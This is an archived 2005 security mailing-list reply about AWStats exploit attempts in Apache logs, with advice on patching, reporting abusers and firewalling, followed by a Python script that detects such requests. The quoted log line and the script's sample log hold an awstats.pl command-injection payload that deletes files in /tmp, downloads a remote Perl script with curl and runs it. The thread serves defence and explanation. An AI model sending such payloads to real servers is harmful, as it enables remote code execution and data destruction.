Security Basics mailing list archives

Re: GET //awstats.pl? in apache logs


From: FocusHacks <focushacks () gmail com>
Date: Mon, 24 Oct 2005 08:55:19 -0500

It's simply someone or some automated scanning script trying to
exploit the AWStats script on your server.  It could be a script
kiddie that's simply running the attack against a wide range of IP
Addresses including yours.  It might also be a worm of some sort
that's looking for a way to propagate itself.  Honestly, I wouldn't be
too concerned about this as long as you're certain that you're up to
date on patches and don't have too many extra things installed on your
web site.  It happens to all of us.

If you do have a lot of things installed on your site, such as
phpMyAdmin, phpNuke, Xoops, and the like, I usually recommend changing
the default path that they're installed in, which makes it more
difficult for automated scanning scripts and/or skript kiddies to
abuse, should an exploit ever be released for that software.

Also, if you can, put non-public WWW scripts and applications in a
directory with HTTP Authentication.  My webalizer and phpMyAdmin
directories are password protected, for instance.

If you continue to see attacks from the same (or similar) IP, then go
to this page and type in the IP Address(es) that the attacks are
coming from.  It will give you ownership and contact info for the
address.  This is usually the attacker's ISP.

http://ws.arin.net/whois

When contacting them (typically via abuse () their-domain-name com),
include as much detail as possible, including the log files attached
(only relevant log file portions) and the time zone that the log
file's date stamp is in.  This will often help them determine which of
their customers it is.

If the IP address seems to be from overseas, especially from Asia,
good luck getting any response or action.  I've found the best way to
solve that problem is to firewall off the subnet that the attacks came
from.  However, I have been known to simply firewall off an entire
class A (59.x.x.x and 61.x.x.x come to mind, both are allocated to
Asia Pacific NIC).

Forgive the horrid colors, but this is a good page with a lot of
well-known shady IP addresses and subnets:

http://www.unixhub.com/block.html

Cheers,
--Noah

On 10/21/05, Konstantine <listclient () gmail com> wrote:
My apache logs show rows after rows of following, all from various IP
addresses. This started a couple of days ago. I don't have awstats.
Could somebody tell me what is that? Is there anything I should be
doing? thanks. K.

GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/kidk1d/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1



--
http://www.FocusHacks.com - The Ford Focus Modification Site!
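As an added example (not part of Noah's reply or the original thread), a small Python script that pulls awstats.pl configdir injection attempts like the one Konstantine quoted out of an Apache combined log, decodes the payload, and tallies the source IPs that would go into the WHOIS/abuse-report step above. The log lines and the download host in them are constructed for this example.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Apache "combined" log format. The request target is split by hand below because
# the scanner's "//awstats.pl" would be misread by urlsplit() as a host name.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]+" (?P<status>\d{3})')

def query_params(query):
    """Split on '&' only (the payload uses ';' as a shell separator) and percent-decode."""
    params = defaultdict(list)
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[unquote(key)].append(unquote(value))
    return params

def awstats_configdir_abuse(target):
    """Decoded configdir value if the request hits awstats.pl with a '|' in it, else None."""
    path, _, query = target.partition("?")
    if not path.endswith("/awstats.pl"):
        return None
    for value in query_params(query).get("configdir", []):
        if "|" in value:  # the pipe is what turns configdir into a command injection
            return value
    return None

def scan(lines):
    """Count matching requests per source IP and keep the decoded payloads."""
    hits, payloads = Counter(), defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        payload = awstats_configdir_abuse(m["target"]) if m else None
        if payload is not None:
            hits[m["ip"]] += 1
            payloads[m["ip"]].append(payload)
    return hits, payloads

# Constructed sample log: RFC 5737 addresses and a placeholder download host.
SAMPLE_LOG = """\
203.0.113.7 - - [21/Oct/2005:03:14:07 -0500] "GET //awstats.pl?configdir=|echo%20;cd%20/tmp;curl%20-O%20http://example.invalid/a.pl;perl%20a.pl;echo| HTTP/1.1" 404 296 "-" "Mozilla/4.0"
198.51.100.9 - - [21/Oct/2005:03:17:02 -0500] "GET /awstats/awstats.pl?config=site HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.4 - - [21/Oct/2005:03:18:30 -0500] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    hits, payloads = scan(SAMPLE_LOG.splitlines())
    for ip, n in hits.most_common():  # candidates for the WHOIS / abuse lookup
        print(f"{ip}: {n} attempt(s); decoded payload: {payloads[ip][0]}")
```

Note that a legitimate AWStats request (second sample line) is not flagged: only a configdir value carrying a pipe counts, and the timestamp's -0500 offset is what you would quote to the abuse desk.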